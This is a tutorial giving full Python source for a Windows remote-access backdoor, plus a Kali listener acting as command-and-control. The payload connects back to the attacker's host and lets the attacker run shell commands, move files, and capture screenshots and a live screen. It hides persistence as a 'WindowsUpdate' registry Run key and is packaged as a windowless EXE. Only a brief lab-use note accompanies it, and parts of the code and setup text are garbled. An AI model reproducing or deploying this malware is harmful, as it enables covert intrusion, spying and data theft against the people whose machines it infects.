Python Windows Backdoor Framework

1. Listener (Kali Linux)

```
import socket
import struct
import cv2
import numpy as np
import os
HOST = "0.0.0.0"
PORT = 4444
def reliable_send(conn, data):
 data = data.encode()
 conn.send(struct.pack('>I', len(data)) + data)
def reliable_recv(conn):
  data_len = struct.unpack('>I', conn.recv(4))[0]
 return conn.recv(data_len).decode()
def recvall(sock, count):
 buf = b''
 while len(buf) < count:
   newbuf = sock.recv(count - len(buf))
   if not newbuf:
      return None
   buf += newbuf
 return buf
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen(1)
print(f"[+] Listening on {PORT}...")
conn, addr = server.accept()
print(f"[+] Connection from {addr}")
while True:
 command = input("C2>")
 reliable_send(conn, command)
```

```
if command.lower() == "exit":
  conn.close()
  break
elif command.startswith("download "):
  filename = command.split(" ", 1)[1]
  with open(filename, "wb") as f:
    data_len = struct.unpack('>I', recvall(conn, 4))[0]
    f.write(recvall(conn, data_len))
  print(f"[+] File {filename} downloaded.")
elif command.startswith("upload"):
  filename = command.split(" ", 1)[1]
  with open(filename, "rb") as f:
    data = f.read()
    conn.send(struct.pack('>I', len(data)) + data)
  print(f"[+] File {filename} uploaded.")
elif command == "screenshot":
  with open("screenshot.png", "wb") as f:
    data_len = struct.unpack('>I', recvall(conn, 4))[0]
    f.write(recvall(conn, data_len))
  print("[+] Screenshot saved as screenshot.png.")
elif command == "livescreen":
  start_signal = conn.recv(5)
  if start_signal != b"START":
    print("[-] Failed to start stream.")
    continue
  print("[+] Live screen started. Press Q to stop.")
  try:
    while True:
      frame_len = struct.unpack('>I', recvall(conn, 4))[0]
      frame_data = recvall(conn, frame_len)
      img_array = np.frombuffer(frame_data, np.uint8)
      frame = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
      if frame is None:
        print("[-] Received empty frame, skipping...")
        continue
      cv2.imshow("Live Screen", frame)
```

2. Windows Payload

```
import socket
import subprocess
import os
import struct
import pyautogui
import shutil
import time
import io
HOST = "KALI_IP" # Replace with your Kali IP
PORT = 4444
def reliable_send(s, data):
  data = data.encode()
 s.send(struct.pack('>I', len(data)) + data)
def reliable_recv(s):
 data_len = struct.unpack('>I', s.recv(4))[0]
 return s.recv(data_len).decode()
def persistence():
 try:
   path = os.environ["APPDATA"] + "\\WindowsPayload.exe"
   if not os.path.exists(path):
      shutil.copyfile(os.path.abspath(__file__), path)
      os.system(f'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
/v WindowsUpdate /t REG_SZ /d "{path}"")
  except:
```

```
pass
```

```
def handle_command(s, command):
 if command.lower() == "exit":
   s.close()
   return False
 elif command.startswith("cd "):
   try:
      os.chdir(command[3:])
      reliable_send(s, "Changed directory.")
    except:
      reliable_send(s, "Failed to change directory.")
 elif command.strip() == "ls":
   output = subprocess.getoutput("dir")
   reliable_send(s, output)
 elif command.startswith("download "):
    filename = command.split(" ", 1)[1]
      with open(filename, "rb") as f:
        data = f.read()
        s.send(struct.pack('>I', len(data)) + data)
   except:
      s.send(struct.pack('>I', 0) + b"")
 elif command.startswith("upload"):
   filename = command.split(" ", 1)[1]
    data_len = struct.unpack('>I', s.recv(4))[0]
   file_data = b"
   while len(file_data) < data_len:
      file_data += s.recv(data_len - len(file_data))
   with open(filename, "wb") as f:
      f.write(file_data)
 elif command == "screenshot":
   screenshot = pyautogui.screenshot()
   screenshot.save("temp.png")
   with open("temp.png", "rb") as f:
      data = f.read()
     s.send(struct.pack('>I', len(data)) + data)
    os.remove("temp.png")
```

```
elif command == "livescreen":
   s.send(b"START")
   while True:
     screenshot = pyautogui.screenshot()
      buffer = io.BytesIO()
      screenshot.save(buffer, format="JPEG", quality=50)
      img_data = buffer.getvalue()
      buffer.close()
      s.send(struct.pack('>I', len(img_data)) + img_data)
     s.settimeout(0.1)
      try:
        stop_signal = s.recv(5).decode()
       if stop_signal == "STOP":
          s.settimeout(None)
          break
     except:
        continue
 else:
   output = subprocess.getoutput(command)
   reliable_send(s, output)
  return True
def connect():
 while True:
   try:
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((HOST, PORT))
     while True:
        command = reliable_recv(s)
        if not handle_command(s, command):
         break
   except:
      time.sleep(5)
# Enable persistence
persistence()
connect()
```

3. Setup & Usage Guide

Follow these steps to set up and run the Python Windows Backdoor Framework:

```
1. On Kali Linux (attacker machine):
```

```
Install dependencies:"bashpip install opency-python numpyRun the listener:"bash
```

2. On Windows target machine:

python3 c2_listener.py

```
Install dependencies:"bashpip install pyautogui pillow
```

- Convert the payload to an EXE file:

```
```bash
pyinstaller --onefile --noconsole payload.py
```
```

- Execute the generated 'WindowsPayload.exe'.

3. Available commands in the shell:

- `ls` List files in the current directory.
- `cd <directory>` Change directory.
- `upload <filename>` Upload a file to the target.
- 'download <filename>' Download a file from the target.
- 'screenshot' Take a screenshot and save as 'screenshot.png'.
- 'livescreen' View the live screen (press 'Q' to stop).
- `exit` Close the connection.

4. Important Notes:

- Run in a closed, isolated network (VirtualBox or VMware recommended).
- Ensure Python 3.x is installed on both machines.